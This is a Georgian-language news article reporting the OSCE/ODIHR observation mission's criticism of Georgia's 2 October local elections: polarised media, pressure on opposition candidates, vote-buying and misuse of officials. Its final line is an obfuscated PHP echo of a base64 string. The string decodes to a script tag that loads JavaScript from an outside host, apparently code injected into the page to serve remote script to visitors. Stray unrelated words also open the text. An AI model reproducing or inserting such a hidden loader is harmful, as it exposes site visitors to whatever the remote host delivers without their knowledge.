celsiusi
ავერსი შნაიდერი
მიუხედავად იმისა, რომ ეუთო/ოდირის სადამკვირვებლო მისიამ უშუალოდ 2 ოქტომბრის ადგილობრივი თვითმმართველობის არჩევნების დღე დადებითად შეაფასა, ისაუბრა იმ უსამართლო გარემოზე, რამაც, საბოლოოდ, მმართველი პარტიის სასარგებლოდ იმუშავა.
 
ეუთო/ოდირის სადამკვირვებლო მისიის ხელმძღვანელმა ალბერტ ჯონსონმა აღნიშნა, რომ „ადგილობრივ არჩევნებს გავლენა ჰქონდა ეროვნულ პოლიტიკურ საკითხებზე და ამ ყველაფერმა გადაფარა ადგილობრივი საკითხები“.
 
„მრავალფეროვანი მედიალანდშაფტი იყო მკვეთრად პოლარიზებული, ხდებოდა მცირე ანალიტიკური გაშუქება, ასევე გაშუქება იყო მიკერძოებული, რამაც მოგვიანებით შეზღუდა ამომრჩევლების შესაძლებლობა, გაეკეთებინათ ინფორმირებული არჩევანი. ასევე, დაშინება და ჟურნალისტების წინააღმდეგ განხორციელებული ძალადობრივი ქმედებები იყო შემაშფოთებელი“ — თქვა ჯონსონმა.
 
სადამკვირვებლო მისიის ხელმძღვანელის თქმით, „ბოროტად იყო გამოყენებული მმართველი პარტიის წარმომადგენელი დამკვირვებლების რესურსი. კერძოდ, ეს ჯგუფები გავლენას ახდენდნენ ამომრჩევლებზე.”
 
„ბევრმა ოპოზიციონერმა კანდიდატმა მოხსნა კანდიდატურა, რადგან ადგილი ჰქონდა ზეწოლას ხელისუფლების მხრიდან“ — აღნიშნა ჯონსონმა.
 
მისივე შეფასებით, „მმართველ პარტიას მისცა არასათანადო უპირატესობა თანამდებობის პირების ჩართულობამ საარჩევნო პროცესში“. მან ასევე ისაუბრა საარჩევნო პერიოდში მოსყიდვის, დაშინებისა და ამომრჩევლებზე ზეწოლის შესახებაც.
 
ჟურნალისტებმა ჯონსონს ჰკითხეს, ამ ჩამოთვლი ფაქტებს რა გავლენა შეიძლება მოეხდინა არჩევნების საბოლოო შედეგებზე, რაზეც სადამკვირვებლო მისიის ხელმძღვანელმა უპასუხა:
 
„ჩვენ ახლა არ ვიმყოფებით იმ პოზიციაში, რომ გავზომოთ, თუ რა ხარისხით და რა დოზით ექნება გავლენა ამ დარღვევებს არჩევნების საბოლოო შედეგებზე. მაგრამ რასაკვირველია, ჩვენ ჩამოვთვალეთ, აღვრიცხეთ და გადავეცით ეს ფაქტები შესაბამის ორგანოებს შემდგომი გამოძიებისთვის, მაგრამ ჩვენ ახლა ვერ გეტყვით, რა გავლენას მოახდენს ეს არჩევნების შედეგებზე“.
 
აღნიშნულ კითხვას უპახუსა ევროპარლამენტარმა მაიკლ გალერმა, რომელიც ასევე აკვირდებოდა არჩევნებს.
 
„არჩევნები არ მიმდინარეობს ვაკუუმში. რა თქმა უნდა, წინასაარჩევნო პერიოდიც გასათვალისწინებელია, რადგან ეს გახლავთ ნაწილი ამ სრული, მთლიანი პროცესისა და ეს გავლენას ახდენს ერთი მხრივ თუ მეორე მხრივ არჩევნების დღეზეც და არჩევნების შედეგებზეც. როგორც ჯონსონმა აღნიშნა, ჩვენ ვერ შევაფასებთ ამას, ეს გადაეცა შესაბამის ორგანოებს“, — აღნიშნა გალერმა და ხაზი გაუსვა პოლარიზაციის შემცირებასთან ერთად, პოლიტიკაში დიალოგის როლის გაძლიერების მნიშვნელობას.
 
ეუთო/ოდირის სადამკვირვებლო მისია ამოქმედდა 26 აგვისტოს და ქვეყანაში 4 სექტემბრიდან მუშაობდა მისიის 30 გრძელვადიანი დამკვირვებელი. მთლიანობაში, აღნიშნული მისიის ფარგლებში არჩევნებს 300-ზე მეტი დამკვირვებელი აკვირდებოდა.
950
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");